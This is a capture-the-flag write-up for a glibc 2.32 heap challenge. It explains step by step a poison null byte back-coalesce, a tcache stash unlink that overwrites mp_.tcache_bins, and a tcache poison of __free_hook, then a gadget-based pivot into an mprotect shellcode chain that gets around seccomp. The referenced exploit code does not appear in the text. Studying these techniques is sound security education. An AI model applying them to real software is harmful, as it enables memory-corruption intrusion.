A few weeks ago, I played with DiceGang in Asis Finals CTF. Yet Another House was one of the heap pwnables, and it only had only one solve (which was by us). The general gist of it involved doing a glibc 2.32 poison null byte attack without a heap leak, a tcache stash unlink attack to overwrite mp_.tcache_bins, and a tcache poison for controlled arb write to escape seccomp for the flag. I didn't plan on making a writeup for this originally, but when redoing this complex pwnable a few weeks later, I thought it would be good for me to make some detailed notes so I don't forget about these techniques.
Before I start, I would like to thank the teammates who worked with me on this: Poortho (who did the majority of the work and blooded it), NotDeGhost, Asphyxia, and noopnoop.
Initial Work:
One thing to note immediately is the patch the author introduced into the glibc library.
By glibc 2.32, there are many more mitigations. As documented in my Player2 writeup, glibc introduced a mitigation against poison null byte where it checks the size header compared to the prev_size header and ensures that they are the same before back coalescing. However, this time, we cannot just forge some headers easily like in Player2 via a heapleak to beat the unlink check. We will have to use the fact that glibc doesn't zero out the pointers for heap operations involving the unsorted and large bin (as each unique sized chunk in largebin has 2 sets of pointers, with the bottom two being fd_nextsize and bk_nextsize to help it maintain the sorted order). This technique has been documented in the following links (though some of them rely on the aid of fastbin pointers which we do not have): BalsnCTF Plainnote writeup, poison null byte techniques, 2.29 off by null bypass (like many pwnable writeups, Chinese CTF players often document some of the coolest and most obscure techniques, but Google Translate should suffice).
An interesting thing to note is that in 2.32, the tcache_perthread_struct no longer uses uint_8 to store tcache counts; it now uses uint_16. Hence, if we can place chunks in around the 0x1420ish range into the tcache_perthread_struct, the memset will not be able to wipe the tcache count (and the pointer as well). Some of you may recall that the tcache count did not matter before as long as you had a pointer in the tcache_perthread_struct (as I believe those checks were once asserts in tcache_get that got compiled out for release builds), but now, there are sanity checks against such behavior; this is why we need to allocate potential chunks for the tcache bin that has its count placed outside the memset range.
In order to expand the size of chunks we can place into the tcache, we can attack the malloc_par struct, with the symbol mp_ in libc. Take careful note of the tcache_bins member.
By overwriting that with a large value (such as a libc address), we can place larger chunks into tcache and to bypass the wipe.
Normally, this type of write makes me think of an unsorted or largebin attack. However, since 2.28, unsorted bin attack has been patched with a bck->fd != victim check, and in 2.30, largebin attack has been hardened against, but how2heap still shows a potential way to perform this attack (I took a closer look at the newer version of this attack after the CTF; though I did not end up testing whether this would actually work in this challenge, it could potentially have offered a much easier alternative with the simpler setup). Another way to achieve this write in glibc 2.32 is to perform what is known as the tcache stashing unlink attack, which I learned from the following links: Heap Exploit v2.31, Tcache Stashing Unlink Attack.
The relevant source for this attack is here:
Basically, when we have chunks inside a specific smallbin, causing malloc to pull from this smallbin will trigger a transfer of chunks into the respective tcache bin afterwards. Notice the point about bck = tc_victim->bk and bck->fd = bin during the stashing process. By corrupting the bk pointer of a smallbin, we can write a libc address into a selected address + 0x10. We must take note to do this only when tcache is one spot away from being filled so the stashing procedure can end immediately afterwards, avoiding any potential corruption. Most writeups would first start out with 6 tcache bins filled and then 2 smallbins, so you can pull out one smallbin and corrupt the bk of the last one (as smallbins are FIFO structures with chunks removed from the tail), trigger the stash process, and have it end immediately as tcache would become full. However, in this case, our tcache_perthread_struct always gets wiped, so we actually need 8 chunks in the smallbin; 1 to pull out, 6 to stash, and the final one to stash and write. Regardless of what happens, this respective smallbin will be corrupted and cannot be used again. If curious, readers can check out the stash unlink+ and stash unlink++ versions of this attack to get an arbitrary address allocation or an arbitrary address allocation and a write of a libc address somewhere in memory.
One more new protective feature in libc 2.32 is pointer obfuscation/safe linking, which I discussed previously in my CUCTF Dr. Xorisaurus writeup, where (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer) for singly linked lists. Once we achieve a heap leak, this protection mechanism is trivial to beat, and the new aligned address check for these lists won't matter as we will be targeting __free_hook.
Lastly, since this writeup requires a lot of heap massaging involving smallbin and largebin, I recommend reviewing this page from the Heap Book for all the conditions. It didn't turn out to bad when writing this exploit as a lot of it just relied on some intuition and checking in a debugger.
Exploit Development:
I recommend closely following around with a debugger, as sometimes my explanations might be wrong or I might have misexplained a small step due to the complexity of this exploit.
To start off, I wrote some helper functions:
Our first goal is to create a massive back coalesce with the poison null byte so we can perform overlaps. This part took quite a while, but Asphyxia ended up figuring this out late at night with the following general technique using largebins, unsorted bins, and normal back coalescing.
Several chunks are allocated, and then three chunks of different sizes (but same largebin) are freed into the unsorted. A chunk larger than all three were requested, causing a new chunk to be pulled from wilderness and the 3 unsorted chunks to be sorted into the same largebin in order, with 2 sets of pointers filled for each due to them having unique sizes. Notice how the one of the middle size has its first set of pointers aligned at an address ending in a null byte; this is purposeful as we will later forge a fake size header over the first set of pointers here, and can perform partial overwrites on other chunks with dangling pointers with just a single null byte from the alloc function to align and pass the unlink check.
Note that I didn't fill the middle chunk with as many characters since I will forge a fake chunk header there soon as it will be the target to back coalesce onto; as the back coalesce region will be quite large, I have to leave the part after the pointers as null bytes (or at least the 1 qword afterwards) as glibc unlink performs additional operations when the previous chunk is of large size and has non null fd_nextsize pointers.
Next, Asphyxia freed the chunk before the chunk in the middle largebin, causing it to back coalesce (while also leaving the 2 sets of pointers behind for me to use) and go into unsorted. Another allocation is made so that the first set of pointers left behind can be used to fake a chunk header, and the next set of pointers can be used as part of the way to beat the unlink checks (I chose a fake size chunk of 0x2150).
Then, we cleared out the unsorted bin, and recovered the other two largebins, to then build an unsorted chain. Order of freeing now matters here for unsorted bins. We want to have the chunk underneath the fake headers to be in the middle, so its address in the unsorted chain can be used and changed to the fake chunk with just a null overwrite (as they are all in the 0x......7XX range).
Now we want to recover the the 0x440 chunk in unsorted, write a single null byte there to satisfy the fd->bk == P check. We want to do the same thing on the 0x460 chunk; in order to preserve its pointers, we will back coalesce it with a chunk before it so the pointers are preserved. Then, an allocation can be made to place a null byte to change the 0x720 ending into a 0x700 ending, and the unlink check will be satisfied. Later on, when I trigger the malicious back coalesce, I will also manage to get some heap pointers in these two chunks for a heap leak due to how unlink works. Notice how the forged chunk has the perfect pointer chain setup to pass the unlink check.
Afterwards, I cleaned up the remaining largebin and unsorted bin, and performed a few more allocations just to expand the number of chunks I would have overlapped. I then allocated a few more chunks of 0x110 size (which I will use later for the tcache stash unlink attack), with some additional fake chunk metadata to allow me to free a fake 0x1510 chunk later, which I plan to use for the tcache poison attack. My final 0x110 chunk allocated is meant to just prevent consolidation later depending on the order of how I build my smallbin chain and I cannot use it as this extra spot is crucial for the later massage.
I triggered the poison null byte after setting the correct prev_size metadata and created a massive unsorted bin that overlapped a lot of memory after I freed the poisoned chunk.
Now chunk 3 will have heap pointers. Chunk 5 also does, but my forged size metadata comes before it so you won't be able to leak it from there.
Here, some serious heap massaging begins. During the CTF, Poortho managed to massage it cleanly in 2-3 hours (basically carrying us to the first blood); I remember his exploit having several dangling unsorted and small chains around so it is quite impressive that he managed to keep the heap stable. It took me much longer to massage the heap, and I had to keep it as clean as possible to avoid breaking it.
Since the libc address for unsorted bins started with a null byte, I had to find a way to get a largebin pointer allocated into the beginning of my chunk data for libc leak. I achieved this by first aligning the unsorted bin with one of my chunk data addresses, then allocated a very large chunk (greater than unsorted size) to trigger largebin activity, hence providing me with a libc leak. Two operations were also performed to fix some of the chunks' size metadata that got corrupted and overwritten during these heap manipulations (but they were unnecessary as I had to change all of them in the next stage of the exploit). I lastly allocated another 0x110 chunk into index 10, and used that as an opportunity to fix index 8's chunk size to something valid that will work with free() nicely.
A general technique I used above and one that I will use from now on to fake sizes or forge metadata is one where I allocate one to two massive chunks from the unsorted bin to reach the specified destination, write the data upon allocation, and then free it in the opposite order of allocation to back coalesce it and restore the state of the unsorted bin.
In order to perform a tcache stash attack in a scenario where the tcache_perthread_struct gets wiped on each malloc(), we need to have 15 0x110 chunks to be freed. The first 7 can be freed into tcache, and the next 8 will be freed into unsorted (in which we have to be very careful to avoid chunk coalescing). From there, we can trigger malloc to move all of them into smallbin, and have the chunk inserted into the 0x110 smallbin last be overlapped to have its bk pointer tampered with; this way we can still stash attack without crashing and have the final chunk entering tcache perform the write. At the current stage, we only have 0x110 chunks in 12, 13, 14, 15, 16, 17, 2, 4, 7, 10, and we will need 5 more. Here is the program chunk array as of now:
The ones marked with X are the 0x110 chunks (or at least should have that as the size and I have to repair them later). The ones marked with S are towards the end of the unsorted overlap, and hence I would like to save them for the overlap writes later. I plan on saving one for the tcache poison, one for the smallbin bk pointer corruption, and just one extra for backup/padding purposes (in the end, I didn't even need it); these were index 1, 6, and 9.
To free up the other chunks, I performed the technique mentioned above (allocate one to two chunks, write the correct size or just spam with 0x21 sizes, and recoalesce back to restore unsorted chunk) on chunks 3 and 5 to make them isolated 0x20 sized chunks (size for index 8 has already been changed in the last 0x110 allocation), on chunk 9 to make it into size 0x1510, and applied it one last time to fix some of the 0x110 chunk size metadata that I may have overwritten. Chunk 11 can be freed before all of these operations by just having it back coalesce into the large unsorted bin. I will also free 0, which will add one more unsorted chunk into the unsorted bin, but luckily it didn't raise any new issues I had to deal with in the heap massage later. We should have 6 free spots at this point; 5 for additional 0x110 chunks and one for padding/alignment purposes to create an overlap.
Now, I added 5 more 0x110 chunks. This cannot just be done as directly as such. Rather, I performed the allocations (and some frees) in such a way such that the unsorted bin created from freeing chunk 0 runs out after 3 0x110 chunk allocations. Then I allocated another 0x110 chunk, allocated a large chunk that extended into index 6 chunk's data (which we control), and allocated a 0x110 chunk from there (providing us with an overlap over a potential smallbin). Since we know that for this last chunk will go into unsorted before smallbin, I had to ensure that it will not coalesce with the neighboring unsorted, so I freed a previous 0x110 chunk and allocated one more from unsorted to act as a guard chunk; the nice thing about the tcache memset is that I can free smaller chunks like these to help with the heap massage without worrying about their return.
One thing to note is the reason for which I chose index 6 to be the one to overlap and overwrite the last smallbin bk. I mentioned it above in the code comments, but it's because there was a 0x110 chunk after it and it was also the first of the three chunks I kept in memory.
At this stage, we have 15 chunks of 0x110 size: index 0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18. To avoid any coalescing and keep these number of chunks for the tcache and smallbin frees, I closely considered the following rules I know (which you can see from debugging):
1. 12 to 17 is a chain (17 won't coalesce into top even if it is treated as unsorted due to a guard chunk placed below early on)
2. 12 will back coalesce into the large unsorted if not entered into tcache.
3. 0, 3 is a chain
4. 8, 10 is a chain
5. 5 is on top of the big unsorted chunk
6. 2, 4 are isolated
7. 7 has the potential to go into unsorted and merge with a smallbin
8. 18 must be the last one into the smallbin
Following these observations, I performed the following free chain: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18. I then made a larger allocation to trigger the transfer to smallbin of the 8 unsorted 0x110 chunks and freed this larger chunk to restore the large unsorted bin's state.
Note that pwndbg labels the doubly linked bins as corrupted whenever I go over 4-5 chunks in them, but in reality, they are fine.
Since we don't have edit anymore, I had to free index 6 into unsorted, and then allocate for it to get it back and perform the overwrite over the index 18 0x110 small chunk to write a libc address into mp_.tcache_bins. Making another request into the smallbin should trigger the stash. 0x110 smallbin is also corrupted afterwards and you should avoid allocating from it.
Between index 1 and 9, I chose to use 9 for my tcache poison. To set this up, I first allocated a large enough chunk to make the unsorted bin small enough so that when I ask for a 0x1510 allocation, it pulls from wilderness. I then freed this new chunk, and then index 9 (which had its size overwritten with 0x1510). Due to the new mp_.tcache_bins value, a tcache chain is created here that is not reached by the 0x280 byte memset hooked onto malloc.
Then, I pulled from a chunk from the large unsorted chunk we had to overlap into what was index 9, and following the pointer obfuscation rules, changed it to __free_hook.
Now, we must decide on how to escape the seccomp filter. Of course we will need to do an open read write rop chain, however how can we pivot with only control over __free_hook (which implies we have control over rdi)?
One idea that we had was setcontext, which is a well known function to use as a stack pivot.
However, starting around libc-2.29 (?) it relied on rdx instead of rdi, and we do not have control over rdx. After some attempts at FSOP and forcing in a format string attack, Poortho and I discovered an extremely powerful COP gadget (which exists in many (newer?) glibc versions) that allows us to control rdx from rdi and call an address relative to rdx. In this libc, it was the following:
mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
This makes it relatively trivial as we can just set up the heap for the ROP (take care of the one push rcx instruction setcontext undergoes). I went for a mprotect to change heap to rwx, and then pivoted it to shellcode on the heap to open read write exit. Due to my previous spamming of 0x21 metadata, I was not able to allocate again from some of the larger chunks, but I had enough left in the unsorted bin to pull smaller chunks out. Here is the final bit of my exploit:
Final Exploit:
Do note that in this writeup, I nop'd out the sleep for the sake of local testing. However, running it with the provided ynetd binary (as the CTF server is no longer up) with a 3 second timeout for each option added onto my script still had it over 10 minutes under the sigalarm limit, so it should have been fine during the actual competition scenario.
Concluding thoughts:
While this challenge was overall pretty decent as it showed some up to date glibc tricks, I felt that some of the elements were unnecessary and added artificial difficulty. This challenge could have been just as difficult conceptually if it allowed for 2-3 more allocation spots (rather than force players who have the correct plans to rewrite their exploit several times), and combining a sigalarm with a 2 second sleep in the main menu didn't add any value. Additionally, while the custom patch made in this libc makes sense and did contribute to overall quality, I do see libc patching happening more often and hope CTF authors do not abuse it to create extremely contrived heap note problems.
Feel free to let me know if I made any mistakes in my explanations (as this problem was quite complex), congrats to Poortho for taking first blood, and thanks again to all those teammates that worked with me in DiceGang, which placed 4th overall!